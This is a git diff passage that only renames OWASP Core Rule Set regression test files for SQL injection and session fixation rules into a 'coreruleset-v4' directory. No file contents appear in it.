rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
